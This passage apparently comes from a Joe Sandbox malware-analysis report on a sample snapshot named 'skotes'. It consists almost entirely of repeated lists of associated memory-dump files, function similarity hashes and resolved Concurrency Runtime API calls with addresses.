                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: BuffersFlushProcessWrite
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2982998374-0
                                                                                                                                                                                                                                          • Opcode ID: 7edf4e69d7bcbfbcbbb29b67f9ba234f5a3947864df7f71eea03b768882064a0
                                                                                                                                                                                                                                          • Instruction ID: 7abbddb364b80097ff28fdecfb2d80c578f770e42f9845503697bc0fcb99770b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7edf4e69d7bcbfbcbbb29b67f9ba234f5a3947864df7f71eea03b768882064a0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5B09232A238348BCA613B14BC1899DBB54DA84A1130A4196D841AB2348E205D828BE4
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3b40bfab62111fe6042667b889bf9bbe577248b95daaf7e2b586503f371ef274
                                                                                                                                                                                                                                          • Instruction ID: f76c8d35037ea9049fcaa2eabceb5a7405fead66d5ab8c46c5dc63b358a1da52
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b40bfab62111fe6042667b889bf9bbe577248b95daaf7e2b586503f371ef274
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8951BEB2A02616CBDB25CF59D8917AAB7F1FB58304F2485ABC405EB2A0E774E940CF50
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00BA26E3
                                                                                                                                                                                                                                            • Part of subcall function 00BA24E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00BA2504
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00BA2704
                                                                                                                                                                                                                                          • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00BA2711
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 00BA275F
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 00BA27E6
                                                                                                                                                                                                                                          • Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 00BA27F9
                                                                                                                                                                                                                                          • Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00BA2846
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2530155754-0
                                                                                                                                                                                                                                          • Opcode ID: 3aeec5179d5318efb7b5a5b501811b4783c3def6625bcff0f1f7fca915d20a32
                                                                                                                                                                                                                                          • Instruction ID: fd2a40c083100d0371ff2655769959d2a09f23d8ecb5641f652d89e10bbb0735
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3aeec5179d5318efb7b5a5b501811b4783c3def6625bcff0f1f7fca915d20a32
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10817C34908249ABDF169F58CA91BBE7BF2EF56304F0440E8FC416B252C7368E55DB61
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00BA2982
                                                                                                                                                                                                                                            • Part of subcall function 00BA24E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00BA2504
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00BA29A3
                                                                                                                                                                                                                                          • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00BA29B0
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 00BA29FE
                                                                                                                                                                                                                                          • Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00BA2AA6
                                                                                                                                                                                                                                          • Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00BA2AD8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1256429809-0
                                                                                                                                                                                                                                          • Opcode ID: 64e65751d199cbc9d67e6f0aefbd624fa0321b592a53deab41801e82491f0db1
                                                                                                                                                                                                                                          • Instruction ID: b5c030608af45c95924454d8b11f24bc427eddb46d812b5ef435413e3bb6f37c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64e65751d199cbc9d67e6f0aefbd624fa0321b592a53deab41801e82491f0db1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F716930908249AFDF15DFA8C991ABEBBF6EF5A304F0440D9EC416B252C7329D15DB61
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00B92876
